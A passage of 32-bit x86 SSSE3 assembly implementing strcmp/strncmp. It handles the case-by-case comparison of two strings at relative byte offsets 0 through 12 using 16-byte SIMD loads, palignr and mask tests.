* The following cases will be handled by ashr_0
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(0~15) n(0~15) 15(15+ n-n) ashr_0
*/
.p2align 4
L(ashr_0):
mov $0xffff, %esi
movdqa (%eax), %xmm1
pxor %xmm0, %xmm0
pcmpeqb %xmm1, %xmm0
pcmpeqb (%edx), %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
mov %ecx, %edi
jne L(less32bytes)
UPDATE_STRNCMP_COUNTER
mov $0x10, %ebx
mov $0x10, %ecx
pxor %xmm0, %xmm0
.p2align 4
L(loop_ashr_0):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
jmp L(loop_ashr_0)
/*
* The following cases will be handled by ashr_1
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(15) n -15 0(15 +(n-15) - n) ashr_1
*/
.p2align 4
L(ashr_1):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $15, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -15(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $1, %ebx
lea 1(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_1):
add $16, %edi
jg L(nibble_ashr_1)
L(gobble_ashr_1):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $1, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_1)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $1, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_1)
.p2align 4
L(nibble_ashr_1):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfffe, %esi
jnz L(ashr_1_exittail)
#ifdef USE_AS_STRNCMP
cmp $15, %ebp
jbe L(ashr_1_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_1)
.p2align 4
L(ashr_1_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $1, %xmm0
psrldq $1, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_2
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(14~15) n -14 1(15 +(n-14) - n) ashr_2
*/
.p2align 4
L(ashr_2):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $14, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -14(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $2, %ebx
lea 2(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_2):
add $16, %edi
jg L(nibble_ashr_2)
L(gobble_ashr_2):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $2, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_2)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $2, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_2)
.p2align 4
L(nibble_ashr_2):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfffc, %esi
jnz L(ashr_2_exittail)
#ifdef USE_AS_STRNCMP
cmp $14, %ebp
jbe L(ashr_2_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_2)
.p2align 4
L(ashr_2_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $2, %xmm0
psrldq $2, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_3
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(13~15) n -13 2(15 +(n-13) - n) ashr_3
*/
.p2align 4
L(ashr_3):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $13, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -13(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $3, %ebx
lea 3(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_3):
add $16, %edi
jg L(nibble_ashr_3)
L(gobble_ashr_3):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $3, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_3)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $3, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_3)
.p2align 4
L(nibble_ashr_3):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfff8, %esi
jnz L(ashr_3_exittail)
#ifdef USE_AS_STRNCMP
cmp $13, %ebp
jbe L(ashr_3_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_3)
.p2align 4
L(ashr_3_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $3, %xmm0
psrldq $3, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_4
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(12~15) n -12 3(15 +(n-12) - n) ashr_4
*/
.p2align 4
L(ashr_4):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $12, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -12(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $4, %ebx
lea 4(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_4):
add $16, %edi
jg L(nibble_ashr_4)
L(gobble_ashr_4):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $4, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_4)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $4, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_4)
.p2align 4
L(nibble_ashr_4):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfff0, %esi
jnz L(ashr_4_exittail)
#ifdef USE_AS_STRNCMP
cmp $12, %ebp
jbe L(ashr_4_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_4)
.p2align 4
L(ashr_4_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $4, %xmm0
psrldq $4, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_5
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(11~15) n -11 4(15 +(n-11) - n) ashr_5
*/
.p2align 4
L(ashr_5):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $11, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -11(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $5, %ebx
lea 5(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_5):
add $16, %edi
jg L(nibble_ashr_5)
L(gobble_ashr_5):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $5, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_5)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $5, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_5)
.p2align 4
L(nibble_ashr_5):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xffe0, %esi
jnz L(ashr_5_exittail)
#ifdef USE_AS_STRNCMP
cmp $11, %ebp
jbe L(ashr_5_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_5)
.p2align 4
L(ashr_5_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $5, %xmm0
psrldq $5, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_6
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(10~15) n -10 5(15 +(n-10) - n) ashr_6
*/
.p2align 4
L(ashr_6):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $10, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -10(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $6, %ebx
lea 6(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_6):
add $16, %edi
jg L(nibble_ashr_6)
L(gobble_ashr_6):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $6, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_6)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $6, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_6)
.p2align 4
L(nibble_ashr_6):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xffc0, %esi
jnz L(ashr_6_exittail)
#ifdef USE_AS_STRNCMP
cmp $10, %ebp
jbe L(ashr_6_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_6)
.p2align 4
L(ashr_6_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $6, %xmm0
psrldq $6, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_7
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(9~15) n - 9 6(15 +(n-9) - n) ashr_7
*/
.p2align 4
L(ashr_7):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $9, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -9(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $7, %ebx
lea 8(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_7):
add $16, %edi
jg L(nibble_ashr_7)
L(gobble_ashr_7):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $7, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_7)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $7, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_7)
.p2align 4
L(nibble_ashr_7):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xff80, %esi
jnz L(ashr_7_exittail)
#ifdef USE_AS_STRNCMP
cmp $9, %ebp
jbe L(ashr_7_exittail)
#endif
pxor %xmm0, %xmm0
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_7)
.p2align 4
L(ashr_7_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $7, %xmm0
psrldq $7, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_8
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(8~15) n - 8 7(15 +(n-8) - n) ashr_8
*/
.p2align 4
L(ashr_8):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $8, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -8(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $8, %ebx
lea 8(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_8):
add $16, %edi
jg L(nibble_ashr_8)
L(gobble_ashr_8):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $8, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_8)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $8, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_8)
.p2align 4
L(nibble_ashr_8):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xff00, %esi
jnz L(ashr_8_exittail)
#ifdef USE_AS_STRNCMP
cmp $8, %ebp
jbe L(ashr_8_exittail)
#endif
pxor %xmm0, %xmm0
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_8)
.p2align 4
L(ashr_8_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $8, %xmm0
psrldq $8, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_9
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(7~15) n - 7 8(15 +(n-7) - n) ashr_9
*/
.p2align 4
L(ashr_9):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $7, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -7(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $9, %ebx
lea 9(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_9):
add $16, %edi
jg L(nibble_ashr_9)
L(gobble_ashr_9):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $9, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_9)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $9, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_9)
.p2align 4
L(nibble_ashr_9):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfe00, %esi
jnz L(ashr_9_exittail)
#ifdef USE_AS_STRNCMP
cmp $7, %ebp
jbe L(ashr_9_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_9)
.p2align 4
L(ashr_9_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $9, %xmm0
psrldq $9, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_10
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(6~15) n - 6 9(15 +(n-6) - n) ashr_10
*/
.p2align 4
L(ashr_10):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $6, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -6(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $10, %ebx
lea 10(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_10):
add $16, %edi
jg L(nibble_ashr_10)
L(gobble_ashr_10):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $10, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_10)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $10, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_10)
.p2align 4
L(nibble_ashr_10):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xfc00, %esi
jnz L(ashr_10_exittail)
#ifdef USE_AS_STRNCMP
cmp $6, %ebp
jbe L(ashr_10_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_10)
.p2align 4
L(ashr_10_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $10, %xmm0
psrldq $10, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_11
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(5~15) n - 5 10(15 +(n-5) - n) ashr_11
*/
.p2align 4
L(ashr_11):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $5, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -5(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $11, %ebx
lea 11(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_11):
add $16, %edi
jg L(nibble_ashr_11)
L(gobble_ashr_11):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $11, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_11)
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $11, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
add $16, %ecx
movdqa %xmm4, %xmm3
jmp L(loop_ashr_11)
.p2align 4
L(nibble_ashr_11):
pcmpeqb %xmm3, %xmm0
pmovmskb %xmm0, %esi
test $0xf800, %esi
jnz L(ashr_11_exittail)
#ifdef USE_AS_STRNCMP
cmp $5, %ebp
jbe L(ashr_11_exittail)
#endif
pxor %xmm0, %xmm0
sub $0x1000, %edi
jmp L(gobble_ashr_11)
.p2align 4
L(ashr_11_exittail):
movdqa (%eax, %ecx), %xmm1
psrldq $11, %xmm0
psrldq $11, %xmm3
jmp L(aftertail)
/*
* The following cases will be handled by ashr_12
* ecx(offset of esi) eax(offset of edi) relative offset corresponding case
* n(4~15) n - 4 11(15 +(n-4) - n) ashr_12
*/
.p2align 4
L(ashr_12):
mov $0xffff, %esi
pxor %xmm0, %xmm0
movdqa (%edx), %xmm2
movdqa (%eax), %xmm1
pcmpeqb %xmm1, %xmm0
pslldq $4, %xmm2
pcmpeqb %xmm1, %xmm2
psubb %xmm0, %xmm2
pmovmskb %xmm2, %edi
shr %cl, %esi
shr %cl, %edi
sub %edi, %esi
lea -4(%ecx), %edi
jnz L(less32bytes)
UPDATE_STRNCMP_COUNTER
movdqa (%edx), %xmm3
pxor %xmm0, %xmm0
mov $16, %ecx
or $12, %ebx
lea 12(%edx), %edi
and $0xfff, %edi
sub $0x1000, %edi
.p2align 4
L(loop_ashr_12):
add $16, %edi
jg L(nibble_ashr_12)
L(gobble_ashr_12):
movdqa (%eax, %ecx), %xmm1
movdqa (%edx, %ecx), %xmm2
movdqa %xmm2, %xmm4
palignr $12, %xmm3, %xmm2
pcmpeqb %xmm1, %xmm0
pcmpeqb %xmm2, %xmm1
psubb %xmm0, %xmm1
pmovmskb %xmm1, %esi
sub $0xffff, %esi
jnz L(exit)
add $16, %ecx
movdqa %xmm4, %xmm3
add $16, %edi
jg L(nibble_ashr_12)
#ifdef USE_AS_STRNCMP
cmp $16, %ebp
lea -16(%ebp), %ebp
jbe L(more8byteseq)
#endif
movdqa (%eax, %ecx), %xmm1
